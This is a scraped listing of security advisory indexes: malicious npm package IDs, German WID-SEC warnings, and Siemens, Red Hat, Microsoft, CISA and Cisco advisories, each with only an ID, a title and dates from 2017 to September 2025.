mal-2024-10903 Malicious code in clarity-vs-code-web-client (npm) 2024-11-24T23:51:51Z 2024-12-05T00:35:14Z
mal-2024-10902 Malicious code in clarity-lsp (npm) 2024-11-25T00:20:45Z 2024-12-05T00:35:14Z
mal-2024-10562 Malicious code in mongoose-4 (npm) 2024-11-08T14:24:20Z 2024-12-05T00:35:14Z
mal-2024-10560 Malicious code in immutable-axelar-bridge (npm) 2024-11-07T23:29:15Z 2024-12-05T00:35:14Z
mal-2024-10559 Malicious code in embrace-helloworld (npm) 2024-11-08T11:40:54Z 2024-12-05T00:35:14Z
mal-2024-10558 Malicious code in dancer-pipeline (npm) 2024-11-08T13:15:53Z 2024-12-05T00:35:14Z
mal-2024-10557 Malicious code in com.immutable.orderbook (npm) 2024-11-08T00:08:13Z 2024-12-05T00:35:14Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2025-1761 Omnissa Workspace ONE UEM: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen 2025-08-11T22:00:00.000+00:00 2025-09-21T22:00:00.000+00:00
wid-sec-w-2025-2074 Mozilla Firefox, Firefox ESR und Thunderbird: Mehrere Schwachstellen 2025-09-16T22:00:00.000+00:00 2025-09-18T22:00:00.000+00:00
wid-sec-w-2025-2023 cURL: Mehrere Schwachstellen ermöglichen Manipulation von Dateien 2025-09-09T22:00:00.000+00:00 2025-09-18T22:00:00.000+00:00
wid-sec-w-2025-1653 Linux Kernel: Mehrere Schwachstellen 2025-07-27T22:00:00.000+00:00 2025-09-18T22:00:00.000+00:00
wid-sec-w-2025-1613 Linux Kernel: Mehrere Schwachstellen 2025-07-20T22:00:00.000+00:00 2025-09-18T22:00:00.000+00:00
wid-sec-w-2025-1522 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-09T22:00:00.000+00:00 2025-09-18T22:00:00.000+00:00
wid-sec-w-2025-2079 JetBrains TeamCity: Mehrere Schwachstellen 2025-09-16T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-2076 Liferay Portal: Mehrere Schwachstellen 2025-09-16T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-2071 WatchGuard Firebox: Schwachstelle ermöglicht Codeausführung 2025-09-16T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-2068 Aruba EdgeConnect: Mehrere Schwachstellen 2025-09-16T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-2049 gdk-pixbuf: Schwachstelle ermöglicht Offenlegung von Informationen 2025-09-14T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-2045 expat: Schwachstelle ermöglicht Denial of Service 2025-09-14T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-2040 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-09-11T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-2028 Red Hat OpenShift Container Platform: Schwachstelle ermöglicht Codeausführung 2025-09-10T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1974 Podman: Schwachstelle ermöglicht Manipulation von Dateien 2025-09-04T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1928 Linux UDisks Daemon: Schwachstelle ermöglicht Privilegieneskalation 2025-08-28T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1863 libTIFF: Schwachstelle ermöglicht Denial of Service 2025-08-19T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1842 PostgreSQL: Mehrere Schwachstellen 2025-08-14T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1817 NGINX: Schwachstelle ermöglicht Offenlegung von Informationen 2025-08-13T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1785 Intel Prozessoren: Mehrere Schwachstellen 2025-08-12T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1756 libTIFF: Schwachstelle ermöglicht Denial of Service 2025-08-11T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1753 vim: Mehrere Schwachstellen ermöglichen Denial of Service 2025-08-10T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1732 Red Hat Enterprise Linux (libxslt): Schwachstelle ermöglicht Codeausführung 2025-08-06T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1718 Red Hat Enterprise Linux (gdk-pixbuf): Schwachstelle ermöglicht Denial of Service 2025-08-04T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1665 Linux Kernel: Mehrere Schwachstellen 2025-07-28T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1664 Python: Schwachstelle ermöglicht Denial of Service 2025-07-28T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1638 Nvidia Treiber: Mehrere Schwachstellen 2025-07-23T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1637 GNU libc: Schwachstelle ermöglicht unspezifischen Angriff 2025-07-23T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1575 vim (.tar and .zip): Mehrere Schwachstellen ermöglichen Codeausführung 2025-07-15T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
wid-sec-w-2025-1567 Oracle MySQL: Mehrere Schwachstellen 2025-07-15T22:00:00.000+00:00 2025-09-17T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-916339 SSA-916339: Information Disclosure Vulnerability in Apogee PXC and Talon TC Devices 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-864900 SSA-864900: Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices 2025-05-13T00:00:00Z 2025-09-09T00:00:00Z
ssa-722410 SSA-722410: Multiple Vulnerabilities in User Management Component (UMC) 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-712929 SSA-712929: Denial of Service Vulnerability in OpenSSL (CVE-2022-0778) Affecting Industrial Products 2022-06-14T00:00:00Z 2025-09-09T00:00:00Z
ssa-691715 SSA-691715: Vulnerability in OPC Foundation Local Discovery Server Affecting Siemens Products 2023-04-11T00:00:00Z 2025-09-09T00:00:00Z
ssa-640476 SSA-640476: Denial of Service Vulnerability in Industrial Edge Management 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-563922 SSA-563922: Local Privilege Escalation Vulnerability in SIMOTION Tools 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-534283 SSA-534283: Insecure File Share Vulnerability in SIMATIC Virtualization as a Service (SIVaaS) 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-503939 SSA-503939: Vulnerabilities in the BIOS of the SIMATIC S7-1500 TM MFP 2025-03-11T00:00:00Z 2025-09-09T00:00:00Z
ssa-494539 SSA-494539: Multiple Vulnerabilities in SINEC OS 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-366067 SSA-366067: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.1 on RUGGEDCOM APE1808 Devices 2024-03-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-331739 SSA-331739: Privilege Escalation Vulnerability in WIBU CodeMeter Runtime Affecting Siemens Products 2025-08-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-282044 SSA-282044: DLL Hijacking Vulnerability in Siemens Web Installer used by the Online Software Delivery 2025-08-12T00:00:00Z 2025-09-09T00:00:00Z
ssa-265688 SSA-265688: Vulnerabilities in the additional GNU/Linux subsystem of the SIMATIC S7-1500 TM MFP V1.1 2024-04-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-027652 SSA-027652: Privilege Escalation Vulnerability in SINAMICS Drives 2025-09-09T00:00:00Z 2025-09-09T00:00:00Z
ssa-707630 SSA-707630: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager Before V3.3 2025-08-12T00:00:00Z 2025-08-26T00:00:00Z
ssa-201595 SSA-201595: Privilege Escalation Vulnerability in WIBU CodeMeter Runtime Affecting the Desigo CC Product Family and SENTRON Powermanager 2025-08-14T00:00:00Z 2025-08-19T00:00:00Z
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products 2023-09-12T00:00:00Z 2025-08-18T00:00:00Z
ssa-395458 SSA-395458: Account Hijacking Vulnerability in Mendix SAML Module 2025-08-14T00:00:00Z 2025-08-14T00:00:00Z
ssa-028723 SSA-028723: Multiple OpenSSL Vulnerabilities in BFCClient Before V2.17 2025-08-12T00:00:00Z 2025-08-13T00:00:00Z
ssa-994087 SSA-994087: Multiple SQLite Vulnerabilities in RUGGEDCOM CROSSBOW Station Access Controller Before V5.7 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-978177 SSA-978177: Vulnerability in Nozomi Guardian/CMC on RUGGEDCOM APE1808 Devices 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-914892 SSA-914892: Race Condition Vulnerability in Basic Authentication Implementation of Mendix Runtime 2024-11-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-908185 SSA-908185: Mirror Port Isolation Vulnerability in RUGGEDCOM ROS Devices 2023-08-08T00:00:00Z 2025-08-12T00:00:00Z
ssa-894058 SSA-894058: Improper Bandwidth Limitation of Network Packets Over Local USB Port Vulnerability in SIPROTEC 5 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-856721 SSA-856721: Vulnerability in RUGGEDCOM Discovery Protocol (RCDP) of Industrial Communication Devices 2017-09-28T00:00:00Z 2025-08-12T00:00:00Z
ssa-840800 SSA-840800: Code Injection Vulnerability in RUGGEDCOM ROS 2022-07-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-800126 SSA-800126: Deserialization Vulnerability in Siemens Engineering Platforms before V20 2024-12-10T00:00:00Z 2025-08-12T00:00:00Z
ssa-794185 SSA-794185: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SIPROTEC, SICAM and Related Products 2025-05-13T00:00:00Z 2025-08-12T00:00:00Z
ssa-787941 SSA-787941: Denial of Service Vulnerability in RUGGEDCOM ROS devices 2022-11-08T00:00:00Z 2025-08-12T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2023:3623 Red Hat Security Advisory: Red Hat Ceph Storage 6.1 security and bug fix update 2023-06-15T09:19:13+00:00 2025-09-22T22:22:07+00:00
rhsa-2023:1486 Red Hat Security Advisory: Red Hat Gluster Storage web-admin-build security update 2023-03-28T00:18:32+00:00 2025-09-22T22:22:06+00:00
rhsa-2023:1049 Red Hat Security Advisory: Red Hat Single Sign-On 7.6.2 security update 2023-03-01T21:58:17+00:00 2025-09-22T22:22:05+00:00
rhsa-2023:1047 Red Hat Security Advisory: Red Hat Single Sign-On 7.6.2 for OpenShift image security and enhancement update 2023-03-01T21:46:46+00:00 2025-09-22T22:22:05+00:00
rhsa-2023:1043 Red Hat Security Advisory: Red Hat Single Sign-On 7.6.2 security update on RHEL 7 2023-03-01T22:02:40+00:00 2025-09-22T22:22:05+00:00
rhsa-2022:8652 Red Hat Security Advisory: Red Hat Fuse 7.11.1 release and security update 2022-11-28T14:39:27+00:00 2025-09-22T22:22:05+00:00
rhsa-2023:1045 Red Hat Security Advisory: Red Hat Single Sign-On 7.6.2 security update on RHEL 9 2023-03-01T21:45:17+00:00 2025-09-22T22:22:04+00:00
rhsa-2022:6507 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.5.2 security fixes and bug fixes 2022-09-13T21:48:13+00:00 2025-09-22T22:22:04+00:00
rhsa-2023:1044 Red Hat Security Advisory: Red Hat Single Sign-On 7.6.2 security update on RHEL 8 2023-03-01T21:45:12+00:00 2025-09-22T22:22:03+00:00
rhsa-2022:7313 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.2 security update and bug fixes 2022-11-02T14:05:53+00:00 2025-09-22T22:22:02+00:00
rhsa-2022:7276 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.4.8 security fixes and container updates 2022-11-01T19:46:29+00:00 2025-09-22T22:22:02+00:00
rhsa-2022:7055 Red Hat Security Advisory: RHOSDT 2.6.0 operator/operand containers Security Update 2022-10-19T12:55:42+00:00 2025-09-22T22:22:01+00:00
rhsa-2022:6835 Red Hat Security Advisory: Service Registry (container images) release and security update [2.3.0.GA] 2022-10-06T12:26:20+00:00 2025-09-22T22:22:01+00:00
rhsa-2022:6813 Red Hat Security Advisory: Red Hat Process Automation Manager 7.13.1 security update 2022-10-05T10:44:49+00:00 2025-09-22T22:22:01+00:00
rhsa-2022:6696 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.4.6 security update and bug fixes 2022-09-26T14:49:03+00:00 2025-09-22T22:22:00+00:00
rhsa-2022:6422 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.0.2 security and bug fixes 2022-09-12T21:10:32+00:00 2025-09-22T22:21:59+00:00
rhsa-2022:6393 Red Hat Security Advisory: RHV Manager (ovirt-engine) [ovirt-4.5.2] bug fix and security update 2022-09-08T11:31:04+00:00 2025-09-22T22:21:59+00:00
rhsa-2022:6392 Red Hat Security Advisory: RHV RHEL Host (ovirt-host) [ovirt-4.5.2] security update 2022-09-08T11:29:21+00:00 2025-09-22T22:21:58+00:00
rhsa-2022:6370 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.6.0 security updates and bug fixes 2022-09-06T22:27:58+00:00 2025-09-22T22:21:58+00:00
rhsa-2022:6345 Red Hat Security Advisory: Multicluster Engine for Kubernetes 2.1 security updates and bug fixes 2022-09-06T14:28:04+00:00 2025-09-22T22:21:57+00:00
rhsa-2022:6277 Red Hat Security Advisory: Red Hat OpenShift Service Mesh 2.1.5 security update 2022-08-31T16:58:21+00:00 2025-09-22T22:21:55+00:00
rhsa-2022:6272 Red Hat Security Advisory: Red Hat OpenShift Service Mesh 2.0.11 security update 2022-08-31T15:00:53+00:00 2025-09-22T22:21:55+00:00
rhsa-2022:6271 Red Hat Security Advisory: Red Hat Advanced Cluster Management 2.3.12 security updates and bug fixes 2022-08-31T14:25:25+00:00 2025-09-22T22:21:55+00:00
rhsa-2022:6156 Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.11.0 security, enhancement, & bugfix update 2022-08-24T13:45:52+00:00 2025-09-22T22:21:55+00:00
rhsa-2022:5915 Red Hat Security Advisory: Red Hat Kiali for OpenShift Service Mesh 2.2 security update 2022-08-08T08:47:11+00:00 2025-09-22T22:21:55+00:00
rhsa-2022:5914 Red Hat Security Advisory: Red Hat Kiali for OpenShift Service Mesh 2.1 security update 2022-08-08T08:16:49+00:00 2025-09-22T22:21:55+00:00
rhsa-2022:5913 Red Hat Security Advisory: Red Hat Kiali for OpenShift Service Mesh 2.0 security update 2022-08-08T08:09:05+00:00 2025-09-22T22:21:55+00:00
rhsa-2025:1019 Red Hat Security Advisory: Satellite 6.16.2 Async Update 2025-02-04T16:17:19+00:00 2025-09-22T22:09:56+00:00
rhsa-2025:0722 Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.4 Container Release Update 2025-01-27T22:39:15+00:00 2025-09-22T22:09:54+00:00
rhsa-2025:0341 Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.5 Container Release Update 2025-01-15T19:34:31+00:00 2025-09-22T22:09:50+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2025-59220 Windows Bluetooth Service Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-59216 Windows Graphics Component Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-59215 Windows Graphics Component Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-55241 Azure Entra Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-18T07:00:00.000Z
msrc_cve-2025-50154 Microsoft Windows File Explorer Spoofing Vulnerability 2025-08-12T07:00:00.000Z 2025-09-17T07:00:00.000Z
msrc_cve-2025-54910 Microsoft Office Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54906 Microsoft Office Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54905 Microsoft Word Information Disclosure Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54904 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54903 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54902 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54901 Microsoft Excel Information Disclosure Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54900 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54899 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54898 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-54896 Microsoft Excel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-49728 Microsoft PC Manager Security Feature Bypass Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-47967 Microsoft Edge (Chromium-based) for Android Spoofing Vulnerability 2025-09-09T07:00:00.000Z 2025-09-16T07:00:00.000Z
msrc_cve-2025-55319 Agentic AI and Visual Studio Code Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-12T07:00:00.000Z
msrc_cve-2025-49734 PowerShell Direct Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-11T07:00:00.000Z
msrc_cve-2025-55317 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55316 Azure Connected Machine Agent Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55245 Xbox Gaming Services Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55243 Microsoft OfficePlus Spoofing Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55236 Graphics Kernel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55234 Windows SMB Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55232 Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55228 Windows Graphics Component Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55227 Microsoft SQL Server Elevation of Privilege Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
msrc_cve-2025-55226 Graphics Kernel Remote Code Execution Vulnerability 2025-09-09T07:00:00.000Z 2025-09-09T07:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
va-25-265-01 Airship AI MFA bypass and default credentials vulnerabilities 2025-09-22T14:06:13Z 2025-09-22T14:06:13Z
icsa-25-261-07 Dover Fueling Solutions ProGauge MagLink LX4 Devices 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-06 Cognex In-Sight Explorer and In-Sight Camera Firmware 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-03 Schneider Electric Saitel DR & Saitel DP Remote Terminal Unit 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-02 Westermo Network Technologies WeOS 5 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-261-01 Westermo Network Technologies WeOS 5 2025-09-18T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-254-10 Daikin Europe N.V Security Gateway 2025-09-11T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol (Update C) 2025-07-10T06:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-24-030-02 Mitsubishi Electric FA Engineering Software Products (Update D) 2024-01-30T07:00:00.000000Z 2025-09-18T06:00:00.000000Z
icsa-25-259-07 Delta Electronics DIALink 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-05 Siemens OpenSSL Vulnerability in Industrial Products 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-03 Siemens SIMATIC NET CP, SINEMA and SCALANCE 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
icsa-25-259-02 Hitachi Energy RTU500 series 2025-09-16T06:00:00.000000Z 2025-09-16T06:00:00.000000Z
va-25-259-01 CISA Thorium multiple vulnerabilities 2025-09-16T00:00:00Z 2025-09-16T00:00:00Z
va-25-258-01 psPAS does not enforce TLS 1.2 within Get-PASSAMLResponse 2025-09-15T18:41:08Z 2025-09-15T18:41:08Z
va-25-174-01 OPEXUS FOIAXpress Public Access Link (PAL) multiple vulnerabilities 2025-07-31T17:01:09Z 2025-09-09T21:12:34Z
va-25-252-01 OPEXUS FOIAXpress Public Access Link (PAL) SQL injection 2025-09-09T20:48:26Z 2025-09-09T20:48:26Z
icsa-25-252-09 Rockwell Automation 1783-NATR 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-08 Rockwell Automation Analytics LogixAI 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-07 Rockwell Automation ControlLogix 5580 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-06 Rockwell Automation CompactLogix® 5480 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-05 Rockwell Automation FactoryTalk Activation Manager 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-04 Rockwell Automation FactoryTalk Optix 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-03 Rockwell Automation Stratix IOS 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-252-01 Rockwell Automation ThinManager 2025-09-09T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-233-01 Mitsubishi Electric Corporation MELSEC iQ-F Series CPU module (Update A) 2025-08-21T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-226-31 Rockwell Automation 1756-ENT2R, 1756-EN4TR, 1756-EN4TRXT (Update A) 2025-08-14T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-219-07 EG4 Electronics EG4 Inverters (Update B) 2025-08-07T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-25-058-01 Schneider Electric communication modules for Modicon M580 and Quantum controllers (Update B) 2025-02-27T07:00:00.000000Z 2025-09-09T06:00:00.000000Z
icsa-24-296-01 Mitsubishi Electric Iconics Digital Solutions and Mitsubishi Electric Products (Update A) 2024-10-22T06:00:00.000000Z 2025-09-09T06:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-snmp-bypass-hhuvujdn Cisco IOS XE SD-WAN Software Packet Filtering Bypass Vulnerability 2025-05-07T16:00:00+00:00 2025-09-22T14:12:28+00:00
cisco-sa-xrsig-uy4zrucg Cisco IOS XR Software Image Verification Bypass Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-iosxr-arp-storm-ejuu55ym Cisco IOS XR ARP Broadcast Storm Denial of Service Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-acl-packetio-swjhhbtz Cisco IOS XR Software Management Interface ACL Bypass Vulnerability 2025-09-10T16:00:00+00:00 2025-09-10T16:00:00+00:00
cisco-sa-fp2k-ipsec-dos-tjwgdzco Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software for Firepower 2100 Series IPv6 over IPsec Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-09-09T21:22:34+00:00
cisco-sa-webex-xss-55bv8hhm Cisco Webex Meetings Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-webex-urlredirect-uk8ddjsz Cisco Webex Meetings URL Redirection Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-phone-write-g3kcc5df Cisco Desk Phone 9800 Series, IP Phone 7800 and 8800 Series, and Video Phone 8875 with SIP Software Vulnerabilities 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-imp-xss-xqgu4hsg Cisco Unified Communications Manager IM & Presence Service Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-epnm-pi-stored-xss-xjqzsycp Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Stored Cross-Site Scripting Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-epnm-info-dis-zhppmfgz Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Information Disclosure Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-epni-arb-file-upload-jjdm2p83 Cisco Evolved Programmable Network Manager Arbitrary File Upload Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-cucm-csrf-w762pryd Cisco Unified Communications Manager Cross-Site Request Forgery Vulnerability 2025-09-03T16:00:00+00:00 2025-09-03T16:00:00+00:00
cisco-sa-3100_4200_tlsdos-2ynscd54 Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software for Firepower 3100 and 4200 Series TLS 1.3 Cipher Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-09-03T13:37:50+00:00
cisco-sa-ucs-xss-ey6xhyps Cisco UCS Manager Software Stored Cross-Site Scripting Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ucs-vkvmorv-cnkrv7hk Cisco Integrated Management Controller Virtual Keyboard Video Monitor Open Redirect Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ucs-multi-cmdinj-e4ukjyrz Cisco UCS Manager Software Command Injection Vulnerabilities 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ucs-kvmsxss-6h7anuyk Cisco Integrated Management Controller Virtual Keyboard Video Monitor Stored Cross-Site Scripting Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nxospc-pim6-vg4jfph Cisco Nexus 3000 and 9000 Series Switches Protocol Independent Multicast Version 6 Denial of Service Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nxos-infodis-tectysfg Cisco NX-OS Software Sensitive Log Information Disclosure Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nxos-cmdinj-qhnze5ss Cisco NX-OS Software Command Injection Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nshs-urapi-gjubvfpu Cisco Nexus Dashboard and Nexus Dashboard Fabric Controller Unauthorized REST API Vulnerabilities 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nd-ptrs-xu2fm2wb Cisco Nexus Dashboard Path Traversal Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-n39k-isis-dos-jhja8rfx Cisco Nexus 3000 and 9000 Series Switches Intermediate System-to-Intermediate System Denial of Service Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ise-file-upload-qksx6c8g Cisco Identity Services Engine Arbitrary File Upload Vulnerability 2025-08-20T16:00:00+00:00 2025-08-20T16:43:01+00:00
cisco-sa-pi-epnm-tet4gxbx Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Sensitive Information Disclosure Vulnerability 2025-08-20T16:00:00+00:00 2025-08-20T16:00:00+00:00
cisco-sa-authproxlog-sxczxq63 Cisco Duo Authentication Proxy Information Disclosure Vulnerability 2025-08-20T16:00:00+00:00 2025-08-20T16:00:00+00:00
cisco-sa-20180328-smi2 Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability 2018-03-28T16:00:00+00:00 2025-08-20T14:26:26+00:00
